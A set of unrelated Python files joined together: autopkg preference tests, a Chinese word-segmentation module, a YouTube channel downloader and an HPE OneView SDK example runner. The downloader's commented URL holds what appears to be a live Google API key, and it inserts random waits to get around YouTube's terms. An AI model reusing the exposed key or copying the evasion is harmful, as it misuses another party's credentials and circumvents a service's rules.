# every call to ensure no false sharing.
self.mock_copykeylist.side_effect = lambda *_, **_kw: list()
self.mock_copyappvalue = patch("autopkglib.CFPreferencesCopyAppValue").start()
self.mock_setappvalue = patch("autopkglib.CFPreferencesSetAppValue").start()
self.mock_appsynchronize = patch(
"autopkglib.CFPreferencesAppSynchronize"
).start()
self.mock_appdirs = patch("autopkglib.appdirs").start()
# Ensure we don't accidentally load real config and muck up tests.
self.mock_appdirs.user_config_dir.return_value = self._workdir.name
self.addCleanup(patch.stopall)
self.addCleanup(self._workdir.cleanup)
def tearDown(self):
pass
def test_new_prefs_object_is_empty(self):
"""A new Preferences object should be empty with no config."""
test_platforms = ["Darwin"]
test_platforms += self.PRIMARY_NON_MACOS_PLATFORMS
for platform in test_platforms:
with self.subTest(platform=platform):
self.mock_platform.return_value = platform
fake_prefs = Preferences()
self.assertEqual(fake_prefs.file_path, None)
self.assertEqual(fake_prefs.type, None)
self.assertEqual(fake_prefs.get_all_prefs(), {})
def test_get_macos_pref_returns_value(self):
"""get_macos_pref should return a value."""
self.mock_copyappvalue.return_value = "FakeValue"
fake_prefs = Preferences()
value = fake_prefs._get_macos_pref("fake")
self.assertEqual(value, "FakeValue")
def test_parse_file_is_empty_by_default(self):
"""Parsing a non-existent file should return an empty dict."""
fake_prefs = Preferences()
value = fake_prefs._parse_json_or_plist_file("fake_filepath")
self.assertEqual(value, {})
@patch_open(TEST_JSON_PREFS)
def test_parse_file_reads_json(self, _mock_file):
"""Parsing a JSON file should produce a dictionary."""
fake_prefs = Preferences()
value = fake_prefs._parse_json_or_plist_file("fake_filepath")
self.assertEqual(value, json.loads(TEST_JSON_PREFS))
@patch_open(TEST_PLIST_PREFS)
def test_parse_file_reads_plist(self, _mock_file):
"""Parsing a PList file should produce a dictionary."""
fake_prefs = Preferences()
value = fake_prefs._parse_json_or_plist_file("fake_filepath")
self.assertEqual(value, plistlib.loads(TEST_PLIST_PREFS))
@patch_open(TEST_PLIST_PREFS)
def test_read_file_fills_prefs(self, _mock_file):
"""read_file should populate the prefs object."""
fake_prefs = Preferences()
fake_prefs.read_file("fake_filepath")
value = fake_prefs.get_all_prefs()
self.assertEqual(value, plistlib.loads(TEST_PLIST_PREFS))
self.assertEqual(fake_prefs.type, "plist")
@patch.object(Preferences, "write_file")
@patch.object(Preferences, "_set_macos_pref")
def test_set_pref_no_file(self, mock_write_file, mock_set_macos_pref):
"""set_pref should change the prefs object, but not write when no file loaded"""
fake_prefs = Preferences()
fake_prefs.set_pref("TEST_KEY", "fake_value")
mock_write_file.assert_not_called()
mock_set_macos_pref.assert_not_called()
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
@patch_open(TEST_JSON_PREFS)
def test_init_prefs_files(self, _mock_open):
"""Preferences should load file-backed config on primary platforms."""
for actual_platform in self.PRIMARY_NON_MACOS_PLATFORMS:
with self.subTest(platform=actual_platform):
self.mock_platform.return_value = actual_platform
prefs = Preferences()
self.assertNotEqual(prefs.file_path, None)
value = prefs.get_all_prefs()
self.assertEqual(value, json.loads(TEST_JSON_PREFS))
self.assertEqual(prefs.type, "json")
@patch_open(b"{}")
@patch.object(Preferences, "write_file")
def test_set_pref_files(self, mock_write_file, mock_open):
"""Preferences().set_pref should write file on file-backed config platforms"""
for actual_platform in self.PRIMARY_NON_MACOS_PLATFORMS:
with self.subTest(platform=actual_platform):
self.mock_platform.return_value = actual_platform
fake_prefs = Preferences()
self.assertNotEqual(fake_prefs.file_path, None)
fake_prefs.set_pref("TEST_KEY", "fake_value")
mock_write_file.assert_called()
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
mock_write_file.reset_mock()
@patch.object(Preferences, "_set_macos_pref")
def test_set_pref_mac(self, mock_set_macos_pref):
"""Preferences().set_pref should write macOS preference store on macOS."""
self.mock_platform.lower.return_value = "darwin"
fake_prefs = Preferences()
fake_prefs.set_pref("TEST_KEY", "fake_value")
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
mock_set_macos_pref.assert_called()
@patch.object(Preferences, "_set_macos_pref")
@patch.object(Preferences, "write_file")
@patch_open(TEST_JSON_PREFS)
def test_set_pref_mac_files(self, mock_open, mock_write_file, mock_set_macos_pref):
"""Preferences().set_pref should write file on macOS and read_file() used."""
self.mock_platform.return_value = "darwin"
fake_prefs = Preferences()
fake_prefs.read_file("fake_config_file")
mock_open.assert_called()
fake_prefs.set_pref("TEST_KEY", "fake_value")
mock_write_file.assert_called()
mock_set_macos_pref.assert_not_called()
value = fake_prefs.get_pref("TEST_KEY")
self.assertEqual(value, "fake_value")
|
#!/usr/bin/env python3
"""
Created on 26 May 2021
@author: Bruno Beloff ([email protected])
"""
import requests
from scs_core.aws.manager.configuration_check_requester import ConfigurationCheckRequester
# --------------------------------------------------------------------------------------------------------------------
requester = ConfigurationCheckRequester(requests, None)
print(requester)
print("-")
response = requester.request('scs-bgx-401')
print(response)
response = requester.request('scs-unknown')
print(response)
|
# 求邻接信息熵
# 传入邻接列表,返回信息熵
from util import entropy, P, eMax, getSeq, cleanStopWord
def wordRank(seq, text):
"""
词的灵活程度又它的左临集合和右临集合判定
"""
LeftSet, RightSet = [], []
cur = text.find(seq)
wl = len(seq)
while cur != -1:
if cur != 0:
LeftSet.append(text[cur - 1:cur])
RightSet.append(text[cur + wl:cur + wl + 1])
cur = text.find(seq, cur + len(seq))
entr = min(entropy(LeftSet), entropy(RightSet))
if entr == 0:
return 0
return 1 / entr
# def C(n, m):
# return math.factorial(n) / (math.factorial(m) * math.factorial(n - m))
# def wordLen(text):
# """出现字符个数"""
# count = 0
# temp = []
# for s in text:
# if (s not in temp):
# count += 1
# temp.append(s)
# return count
def wordCohesion(seq, text):
"""
词的内聚程度由
"""
Pseq = P(seq, text)
subPairs = [[seq[:i], seq[i:]] for i in range(1, len(seq))]
pPair = map(lambda pair: Pseq / (P(pair[0], text) * P(pair[1], text)),
subPairs)
return min(pPair)
def seqsScore(text, maxlen=4, normalization=True):
assert maxlen >= 2
seqs = []
for i in range(2, maxlen + 1):
seqs += getSeq(text, i)
scores = []
fmax, fmin = 0, 0
cmax, cmin = 0, 0
rmax, rmin = 0, 0
for word in seqs:
ws = {
"self": word,
"freq": text.count(word),
"cohes": wordCohesion(word, text),
"rank": wordRank(word, text)
}
if ws["rank"] == 0:
continue
scores.append(ws)
if ws["freq"] > fmax:
fmax = ws["freq"]
if ws["freq"] < fmin:
fmin = ws["freq"]
if ws["cohes"] > cmax:
cmax = ws["cohes"]
if ws["cohes"] < cmin:
cmin = ws["cohes"]
if ws["rank"] > rmax:
rmax = ws["rank"]
if ws["rank"] < rmin:
rmin = ws["rank"]
if not normalization:
return scores
# normalization
for ws in scores:
ws["freq"] = eMax(ws["freq"], fmin, fmax)
ws["cohes"] = eMax(ws["cohes"], cmin, cmax)
ws["rank"] = eMax(ws["rank"], rmin, rmax)
ws["score"] = ws["freq"] * ws["cohes"] * ws["rank"]
return scores
def shift(words):
clened = []
words = sorted(words, key=lambda x: len(x))
for w in words:
w = cleanStopWord(w)
# if len(w) == 1:
# continue
while True:
if w == "":
break
canQuit = True
for c in clened:
if w.find(c) != -1:
w = w.replace(c, "")
canQuit = False
break
if canQuit:
break
if w != "":
clened.append(w)
return clened
def dig(text, maxlen=4):
assert maxlen >= 2
scores = seqsScore(text, maxlen)
scores = sorted(scores, key=lambda x: x["score"])
return [s["self"] for s in scores[::-1]]
def dictPart(text, wd, maxl):
src = text
ts = []
while len(text) != 0:
seqs = getSeq(text, maxl) + [i for i in text]
hit = False
for s in seqs:
if s in wd:
ts.append(s)
text = text.replace(s, "", 1)
hit = True
break
if not hit:
ts += [text]
break
return sorted(ts, key=lambda x: src.find(x))
def autoParticiple(text, maxlen=5):
words = dig(text, maxlen)
words = shift(words)
words = sorted(words, key=lambda x: -len(x))
wMax = max([len(x) for x in words])
tokens = []
seq = ""
for s in text:
seq += s
if len(seq) >= wMax:
tokens += dictPart(seq, words, wMax)
seq = ""
if seq in words:
tokens.append(seq)
seq = ""
return tokens
if __name__ == "__main__":
from pprint import pprint
# res = entropy(["哈", "哈", "a", "this"])
# res = entropy(["哈", "哈", "哈", "哈"])
# print(res)
text = ""
text1 = "四是四十是十十四是十四四十是四十"
text2 = "十四是十四四十是四十,十四不是四十,四十不是十四"
# print(wordCohesion("信息", text))
# print(wordRank("信息", text))
# print(wordLen(text))
# print(C(wordLen(text), 2))
# print(getSeq(text, 1))
# ss = seqsScore(text1)
# top = [x["self"] for
# x in sorted(ss, lambda x: x["score"])[::-1][:10]]
# print(top)
# print(dig(text1))
print(shift(dig(text, 5)))
# print(shift(dig(text2)))
# print(" ".join(autoParticiple(text)))
# print(" ".join(autoParticiple(text2)))
# print(" ".join(autoParticiple(text1)))
# print(autoParticiple(text1,maxlen=2))
# pprint(seqsScore(text,4,False))
# print(wordRank("四是",text1))
|
# Steven Atkinson
# [email protected]
# April 5, 2018
"""
Elliptic problem
dimensionality reduction is data-driven and Bayesian, inputs to forward
surrogate are uncertain.
Uses two KGPLVMs
"""
from __future__ import absolute_import
from . import data, train, train_doe, analysis, util |
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 16 18:26:18 2020
@author: Wilson
"""
import json, requests, time, random
from pytube import YouTube
from datetime import datetime
from sys import exit
import re, io
count = 0
countDL = 0
countSkip = 0
starttime = datetime.now()
#random timer wait
def wait(start, end):
time.sleep(random.uniform(start,end))
#ffmpeg function to merge discrete video/audio tracks into one - must have ffmpeg-python pip installed and in windows
#Ensure that subdirectories videos\ProcessedVideos already exist
import ffmpeg
def AVprocess(v, a, d):
input_video = ffmpeg.input(str(d) + str(v))
input_audio = ffmpeg.input(str(d) + str(a))
ffmpeg.output(input_audio, input_video, str(d) + 'ProcessedVideos/' + str(v)).run()
#YouTube Download Function
from os import path
def YouTubeDL(vID, vTitle, vEpisode):
global countDL
global countSkip
fileName = str(str(vEpisode[0:3]).zfill(3) + "-" + str(vID) + "-" + vTitle)
ytLink = str('https://www.youtube.com/watch?v=') + str(vID)
if path.exists('./videos/' + fileName + '.mp4') or path.exists('./videos/ProcessedVideos/' + fileName + '1080p.mp4'):
#checks video directory for Progressive video already existing to avoid repeated downloads
print('SKIPPED - YouTube file ' + fileName + ' located at ' + ytLink + ' already exists in directory.')
countSkip +=1
else: #downloads and converts videos if not already downloaded
wait(1,5) #random wait times to pause automation from violating YT TOS
yt = YouTube(ytLink)
#Progressive Video Download (<720p)
video = yt.streams.filter(progressive='True').first()
#fileName = (str(videoEpisode) + "-" + str(videoTitle) + "-" + videoID)
video.download('./videos',fileName)
#High Resolution Video/Audio Download
video = yt.streams.filter(resolution='1080p').first()
video.download('./videos',fileName + '1080p')
audio = yt.streams.filter(abr='160kbps').first()
audio.download('./videos',fileName + '160kbps')
#English Caption Download
try: #error handling for cases where subtitles may not exist or is erroronous
captionFile = io.open('./videos/' + fileName + '.srt',mode='w',encoding='utf-8')
#caption = yt.captions.get_by_language_code('en') old deprecated function
caption = yt.captions['en'] #new dictionary call (untested)
captionFile.write(caption.generate_srt_captions())
captionFile.close()
except:
Logging('Caption generation failed for video ' + videoID)
pass
#Combine High Resolution
try:
AVprocess(fileName+'1080p.mp4', fileName+'160kbps.webm', './videos/')
countDL += 1
except:
Logging('AVprocess failed for video ' + videoID)
pass
#Writes same SRT file for Hi Resolution Video
try:
captionFile2 = io.open('./videos/ProcessedVideos/' + fileName + '1080p.srt',mode='w',encoding='utf-8')
captionFile2.write(caption.generate_srt_captions())
captionFile2.close()
except:
Logging('Caption generation failed for video' + videoID)
pass
def Logging(text):
Log = io.open('YTlog.txt',mode='a+',encoding='utf-8')
Log.write(str(datetime.today().strftime('%m.%d.%Y-%H:%M:%S')) + " - " + text + "\n")
Log.close()
#URL must include valid Google YouTube Data API V3 API Key
#YouTube Playlist API returns different JSON structures
#url = 'https://www.googleapis.com/youtube/v3/playlistItems?playlistId=PLS-7gvHvjh_CW6pL2lSHtu0CO_iUAj8E9&maxResults=50&part=snippet&key=AIzaSyCGXnwsFt6S7sRq7zwuGPvDLU0zvKbgHwE'
url = 'https://www.googleapis.com/youtube/v3/search?part=snippet&channelId=UCpZqbJnB1yr3pzNgYGjWvfw&maxResults=50&order=date&q=gudetama%2Banimation%2Bepisode%2Bofficial%2Bupload%2B%E3%80%90Sanrio%2BOfficial%E3%80%91&type=video&key=[API KEY]'
response = requests.get(url)
data = json.loads(response.text)
videos = {}
vList = io.open('videoList.txt',mode='w',encoding='utf-8')
try:
for x in range(len(data['items'])):
#print(data['items'][x]['id']['videoId'])
#links.append(str('https://www.youtube.com/watch?v=') + str(data['items'][x]['snippet']['resourceId']['videoId']))
videoID = data['items'][x]['id']['videoId']
videoTitle = data['items'][x]['snippet']['title']
videos[videoID] = videoTitle #writes video ID/title as dictionary pair
videoEpisode = re.sub('[^0-9]','', videoTitle) #extracts only digits from video title
#videoList(videoID) #writes video ID into a link for reference
vList.write(str('https://www.youtube.com/watch?v=') + str(videoID) + "\n")
YouTubeDL(videoID, videoTitle, videoEpisode) #Downloads YouTube video
count += 1
except KeyError:
starttime = datetime.now() - starttime
print('An API exception has occurred, this may be due to API quota limitation.')
Logging(str(" - An API exception has occurred" + str(count) + " videos found, "
+ str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds."))
exit()
while 'nextPageToken' in data:
try:
paginationToken = data['nextPageToken']
url2 = url + '&pageToken=' + paginationToken
response = requests.get(url2)
data = json.loads(response.text)
for x in range(len(data['items'])):
videoID = data['items'][x]['id']['videoId']
videoTitle = data['items'][x]['snippet']['title']
videos[videoID] = videoTitle
videoEpisode = re.sub('[^0-9]','', videoTitle)
#videoList(videoID) #writes video ID into a link for reference
vList.write(str('https://www.youtube.com/watch?v=') + str(videoID) + "\n")
YouTubeDL(videoID, videoTitle, videoEpisode) #Downloads YouTube video
count += 1
except KeyError:
starttime = datetime.now() - starttime
print('An API exception has occurred, this may be due to API quota limitation.')
Logging(str(" - An API exception has occurred" + str(count) + " videos found, "
+ str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds."))
exit()
vList.close()
#End of Script Logging function
starttime = datetime.now() - starttime
Logging(str(str(count) + " videos found, " + str(countSkip) + "videos skipped, and "
+ str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds."))
print(str(count) + " videos found, " + str(countSkip) + "videos skipped, and "
+ str(countDL) + " videos downloaded and processed. Process duration: " + str(starttime) + " seconds." + "\n")
|
import logging, fileinput, fnmatch, subprocess
import requests
from bs4 import BeautifulSoup
import sys
import os
from datetime import datetime
import re
from subprocess import Popen, STDOUT, PIPE
from ansible_playbook_runner import Runner
api_version = '2600'
rel_dict = {
'Appliance Configuration Timeconfig': 'appliance_configuration_timeconfig',
'Appliance SNMPv1 Trap Destinations': 'appliance_device_snmp_v1_trap_destinations',
'Appliance SNMPv3 Users': 'appliance_device_snmp_v3_users',
'Appliance SNMPv3 Trap Destinations': 'appliance_device_snmp_v3_trap_destinations',
'Appliance SSH Access': 'appliance_ssh_access',
'Appliance Device Read Community': 'appliance_device_read_community',
'Appliance Time and Locale Configuration': 'appliance_time_and_locale_configuration',
'ID Pool IPv4 Subnets': 'id_pools_ipv4_subnets',
'ID Pool IPv4 Range': 'id_pools_ipv4_ranges',
'FC Networks': 'fc_networks',
'FCoE Networks': 'fcoe_networks',
'Ethernet Networks': 'ethernet_networks',
'Network Sets': 'network_sets',
'Connection Templates': 'connection_templates',
'Certificates Server': 'certificates_server',
'Enclosures': 'enclosures',
'Enclosure Groups': 'enclosure_groups',
'Firmware Drivers': 'firmware_drivers',
'Hypervisor Cluster Profiles': 'hypervisor_cluster_profiles',
'Hypervisor Managers': 'hypervisor_managers',
'Interconnects': 'interconnects',
'Interconnect Types': 'interconnect_types',
'Logical Enclosures': 'logical_enclosures',
'Logical Interconnects': 'logical_interconnects',
'Logical Interconnect Groups': 'logical_interconnect_groups',
'Scopes': 'scopes',
'Server Hardware': 'server_hardware',
'Server Hardware Types': 'server_hardware_types',
'Server Profiles': 'server_profiles',
'Server Profile Templates': 'server_profile_templates',
'Storage Pools': 'storage_pools',
'Storage Systems': 'storage_systems',
'Storage Volume Templates': 'storage_volume_templates',
'Storage Volume Attachments': 'storage_volume_attachments',
'Volumes': 'volumes',
'Tasks': 'tasks',
'Uplink Sets': 'uplink_sets'
}
class DataFromWebScraping(object):
def __init__(self, ele):
self.ele = ele
if self.ele == 'certificates_server':
self.replaced_ele = self.ele.replace('certificates_server', '/certificates/servers')
elif self.ele == 'volumes':
self.replaced_ele = self.ele.replace('volumes', 'storage-volumes')
else:
self.replaced_ele = self.ele.replace('_', '-')
def data_scraped(self):
"""
Scrapping data for list of endpoints from API docs.
"""
URL = "https://techlibrary.hpe.com/docs/enterprise/servers/oneview5.3/cicf-api/en/rest/" + self.replaced_ele + ".html.js"
r = requests.get(URL)
soup = BeautifulSoup(r.content,
'html5lib') # If this line causes an error, run 'pip install html5lib' or install html5lib
body = soup.find('body')
string = str(body).replace('<body>define([],"', '').replace('");</body>', '')
soup = BeautifulSoup(string, 'html5lib')
api_list = soup.find('div', {"class": "\\\"api-list\\\""})
api_with_method = []
http_methods = []
apis = []
for span in api_list.find_all('span', {'class', '\\\"uri\\\"'}):
apis.append(span.text.strip())
for span in api_list.find_all('span', {'class', '\\\"method'}):
http_methods.append(span.text.strip())
for http_method, api in zip(http_methods, apis):
api_with_method.append({api, http_method})
return api_with_method
class Tee(object):
"""
To show logs on console and flushing the same to logs file.
"""
def __init__(self, filename):
self.stdout = sys.stdout
self.file = filename
def write(self, obj):
self.file.write(obj)
self.stdout.write(obj)
self.file.flush()
def flush(self):
self.stdout.flush()
self.file.flush()
def runAnsiblePlaybooks(success_files, failed_files):
"""
To run ansible playbooks using python module.
"""
ansible_modules_list = open('ansible_modules_list', 'r')
resources_for_ansible = ansible_modules_list.read().splitlines()
ansible_modules_list.close()
loaded_resources_for_ansible = modifyExecutedFiles(resources_for_ansible)
print("loaded_resources for ansible are {}".format(str(loaded_resources_for_ansible)))
try:
for resource_for_ansible in resources_for_ansible:
result = Runner(['/etc/ansible/hosts'], resource_for_ansible).run()
if result == 0:
success_files.append(resource_for_ansible)
else:
failed_files.append(resource_for_ansible)
except Exception as e:
print("Error while executing playbook {}".format(str(e)))
return success_files, failed_files
def LoadResourcesFromFile():
"""
To load resources(examples) from external config file.
"""
resource_file = open('re.txt', 'r')
resources_from_file = resource_file.read().splitlines()
resource_file.close()
return resources_from_file
def modifyExecutedFiles(executed_files):
"""
Modifying ansible playbook names to make them uniform across all SDK's
"""
exe = []
for executed_file in executed_files:
executed_file = executed_file.replace('.yml', '').replace('oneview_', '').replace('_facts', '')
executed_file = executed_file + 's'
exe.append(executed_file)
return list(set(exe))
def ExecuteFiles(selected_sdk):
is_ansible = False
if selected_sdk not in ['ansible']:
loaded_resources = LoadResourcesFromFile()
print("loaded_resources are {}".format(str(loaded_resources)))
cwd = os.getcwd()
failed_files = []
success_files = []
examples = []
val = selected_sdk
valid_sdks = ['python', 'ruby', 'go', 'ansible', 'puppet', 'chef', 'terraform']
if val in ['ruby', 'chef', 'puppet']:
rel_dict2 = {'Storage Volume Templates': 'volume_templates',
'Storage Volume Attachments': 'volume_attachments',
'Certificates Server': 'server_certificates',
'Server Hardware': 'server_hardwares',
}
rel_dict.update(rel_dict2)
else:
pass
print("Started executing files")
LOG_FILENAME = datetime.now().strftime('logfile_%H_%M_%d_%m_%Y.log')
f = open(LOG_FILENAME, 'w')
original = sys.stdout
sys.stdout = Tee(f)
if val in valid_sdks and val == 'ansible':
is_ansible = True
success_files, failed_files = runAnsiblePlaybooks(success_files, failed_files)
return success_files, is_ansible
f.close()
else:
pass
if val in valid_sdks and val != 'ansible':
for ele in loaded_resources:
examples.append(rel_dict[ele])
for example in examples:
example_file = cwd + '/' + example
try:
if val == 'python':
example_file_with_extension = example_file + str('.py')
print(">> Executing {}..".format(example))
exec (compile(open(example_file_with_extension).read(), example_file_with_extension, 'exec'))
success_files.append(example)
elif val == 'ruby' and example not in ['tasks', 'interconnect_types']:
example_file_with_extension = example_file[:-1] + str('.rb')
cmd = "ruby {}".format(example_file_with_extension)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
elif val == 'go':
value_updated = input(
"\nPlease provide \"true\" as input if below mentioned example have varaiable updated with described values as below else provide \"false\" as input to terminate\n\nexamples/server_certificate.go\n\tserver_certificate_ip\t= \"172.18.11.11\"\nexamples/hypervisor_managers.go\n\thypervisor_manager_ip\t= \"172.18.13.11\"//\"<hypervisor_manager_ip>\"\n\tusername\t= \"dcs\" //\"<hypervisor_user_name>\"\n\tpassword\t= \"dcs\" //\"<hypervisor_password>\"\nexamples/storage_systems.go\n\tusername\t=\"dcs\"\n\tpassword\t=\"dcs\"\n\thost_ip \t=\"172.18.11.11\"\n\thost2_ip\t=\"172.18.11.12\"\n>>")
if value_updated.lower() == 'false':
sys.exit()
example_file_with_extension = example_file + str('.go')
cmd = "go run {}".format(example_file_with_extension)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
elif val == 'terraform':
''' value_updated = input("\nPlease provide \"true\" as input if below mentioned example have varaiable updated with described values as below else provide \"false\" as input to terminate\n\nexamples/server_certificate.go\n\tserver_certificate_ip\t= \"172.18.11.11\"\nexamples/hypervisor_managers.go\n\thypervisor_manager_ip\t= \"172.18.13.11\"//\"<hypervisor_manager_ip>\"\n\tusername\t= \"dcs\" //\"<hypervisor_user_name>\"\n\tpassword\t= \"dcs\" //\"<hypervisor_password>\"\nexamples/storage_systems.go\n\tusername\t=\"dcs\"\n\tpassword\t=\"dcs\"\n\thost_ip \t=\"172.18.11.11\"\n\thost2_ip\t=\"172.18.11.12\"\n>>")
if value_updated.lower() == 'false':
sys.exit()'''
build_cmd = "go build -o terraform-provider-oneview"
moving_binary_cmd1 = "mkdir -p ~/.terraform.d/plugins/"
moving_binary_cmd2 = "mv terraform-provider-oneview ~/.terraform.d/plugins/"
build = subprocess.Popen(build_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
build.wait()
if build.poll() == 0:
build = subprocess.Popen(moving_binary_cmd1, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
build = subprocess.Popen(moving_binary_cmd2, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
build_output, build_errors = build.communicate()
if build_errors:
print(build_errors)
sys.exit()
example_loc = cwd + '/examples/' + example + '/'
init_cmd = "terraform init"
init_p = subprocess.Popen(init_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
print("running terraform init")
init_p.wait()
for i in range(3):
if i == 0:
copy = "cp " + example_loc + "main.tf " + cwd
copy_p = subprocess.Popen(copy, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
_, copy_errors = copy_p.communicate()
if copy_errors is None:
plan_cmd = "terraform plan"
print("executing main.tf plan: ", example)
plan_p = subprocess.Popen(plan_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
plan_p.wait()
if plan_p.poll() == 0:
_, plan_errors = plan_p.communicate()
if plan_errors is None:
apply_cmd = "terraform apply --auto-approve"
print("executing main.tf apply: ", example)
apply_p = subprocess.Popen(apply_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, shell=True)
_, apply_errors = apply_p.communicate()
apply_p.wait()
os.remove(cwd + "/main.tf")
if apply_errors != None:
failed_files.append(example + " main.tf")
else:
success_files.append(example + " main.tf")
else:
os.remove(cwd + "/main.tf")
failed_files.append(example + " main.tf")
else:
os.remove(cwd + "/main.tf")
failed_files.append(example + " main.tf plan_p.poll is != 0, ")
else:
failed_files.append(example + " failed to copy main file, ")
elif i == 1:
copy = "cp " + example_loc + "update_resource.tf " + cwd
copy_p = subprocess.Popen(copy, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
_, copy_errors = copy_p.communicate()
if copy_errors is None:
print("executing update_resource.tf plan: ", example)
plan_cmd = "terraform plan"
plan_p = subprocess.Popen(plan_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
plan_p.wait()
if plan_p.poll() == 0:
_, plan_errors = plan_p.communicate()
if plan_errors is None:
print("executing update_resource.tf apply: ", example)
apply_cmd = "terraform apply --auto-approve"
apply_p = subprocess.Popen(apply_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, shell=True)
apply_p.wait()
_, apply_errors = apply_p.communicate()
os.remove(cwd + "/update_resource.tf")
if apply_errors != None:
failed_files.append(example + " update_resource.tf")
else:
success_files.append(example + " update_resource.tf")
else:
os.remove(cwd + "/update_resource.tf")
failed_files.append(example + " update_resource.tf")
else:
os.remove(cwd + "/update_resource.tf")
failed_files.append(example + " update_resource.tf the plan_p.poll is != 0, ")
else:
failed_files.append(example + " failed to copy update_resource file, ")
else:
copy = "cp " + example_loc + "data_source.tf " + cwd
copy_p = subprocess.Popen(copy, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
_, copy_errors = copy_p.communicate()
if copy_errors is None:
print("executing data_source.tf plan: ", example)
plan_cmd = "terraform plan"
plan_p = subprocess.Popen(plan_cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE,
shell=True)
plan_p.wait()
if plan_p.poll() == 0:
_, plan_errors = plan_p.communicate()
if plan_errors is None:
print("executing data_source.tf apply: ", example)
apply_cmd = "terraform apply --auto-approve"
apply_p = subprocess.Popen(apply_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE, shell=True)
apply_p.wait()
_, apply_errors = apply_p.communicate()
os.remove(cwd + "/data_source.tf")
if apply_errors != None:
failed_files.append(example + " data_source.tf")
else:
success_files.append(example + " data_source.tf")
else:
os.remove(cwd + "/data_source.tf")
failed_files.append(example + " data_source.tf")
else:
os.remove(cwd + "/data_source.tf")
failed_files.append(example + " data_source.tf the plan_p.poll is != 0, ")
else:
failed_files.append(example + " failed to copy data_source file ")
'''contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)'''
elif val == 'puppet' and example not in ['tasks', 'scopes', 'interconnect_types']:
example_file_with_extension = example_file[:-1] + str('.pp')
cmd = "puppet apply --modulepath={}".format(example_file_with_extension)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
elif val == 'chef' and example not in ['tasks', 'scopes', 'interconnect_types']:
example_file_with_extension = example_file[:-1] + str('.rb')
cmd = "chef client -z -o oneview::{}".format(example)
p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p.wait()
contents = p.stdout.read()
print(contents)
output, errors = p.communicate()
if errors is None:
success_files.append(example)
else:
failed_files.append(example)
else:
pass
except Exception as e:
print("Failed to execute {} with exception {}".format(str(example), (str(e))))
failed_files.append(example)
sys.stdout = original
print("success files are {}".format(str(success_files)))
return success_files, is_ansible, val
f.close()
else:
print("Sorry, please enter the valid SDK among the following {}".format(str(valid_sdks)))
class WriteToChangeLog(object):
"""
Here we have exception handling. In case if any of the value for the key is not present,
then it will raise a exception and we are catching it. Our script will continue further and
will add modules other than the missing one.
Output will look like:
##### Features supported with the current release(v5.0.0)
- FC Network
- FCOE-Network
:param rel_list:
:param rel_version:
:return:
"""
def __init__(self, rel_list, sdk):
self.rel_list = rel_list
self.sdk = sdk
if self.sdk == 'ruby':
path_parent = os.path.dirname(os.getcwd())
os.chdir(path_parent)
path_parent = os.path.dirname(os.getcwd())
os.chdir(path_parent)
print(os.getcwd())
f = open("CHANGELOG.md", "r")
first_line = f.readline()
file_name = 'CHANGELOG.md'
list_of_linenos = self.search_string_in_file(first_line, file_name)
if list_of_linenos is not None and len(list_of_linenos) is not None:
self.delete_multiple_lines(file_name, list_of_linenos)
self.added_integer = float(first_line[2:5])
else:
self.added_integer = float(first_line[2:5]) + float('0.1')
self.final_version = str(self.added_integer) + '.0'
f.close()
def delete_multiple_lines(self, file_name, linenos):
start = int(linenos[0])
end = int(linenos[1])
count = end - start
for line in fileinput.input(file_name, inplace=1, backup='.orig'):
if start <= fileinput.lineno() < start + count:
pass
else:
print(line[:-1])
fileinput.close()
def search_string_in_file(self, first_line, file_name):
line_number = 0
count = 0
list_of_results = []
if (first_line[8:18] == 'unreleased' or first_line[8:18] == 'Unreleased'):
with open(file_name, 'r') as read_obj:
for line in read_obj:
if count == 2:
break
else:
line_number += 1
if re.search("^#\s([0-9][.]*){2}", line):
list_of_results.append(line_number)
count += 1
return list_of_results
def write_data(self):
rel_modules = []
oneview_api_version = 'OneView ' + 'v' + str(self.added_integer)
try:
for ele in self.rel_list:
rel_modules.append(list(rel_dict.keys())[list(rel_dict.values()).index(ele)])
print(str(rel_modules))
except Exception as e:
logging.debug("Unable to find a module {0}".format(str(e)))
print("Started writing to CHANGELOG")
try:
dummy_file = open("dummy_CHANGELOG.md", "w")
dummy_file.write("# {}(unreleased)".format(str(self.final_version)))
dummy_file.write("\n#### Notes\n")
dummy_file.write("Extends support of the SDK to OneView REST API version {} ({})".format(str(api_version),
str(
oneview_api_version)))
dummy_file.write("\n\n##### Features supported with the current release\n")
for ele in sorted(rel_modules):
dummy_file.write("- {0} \n".format(str(ele)))
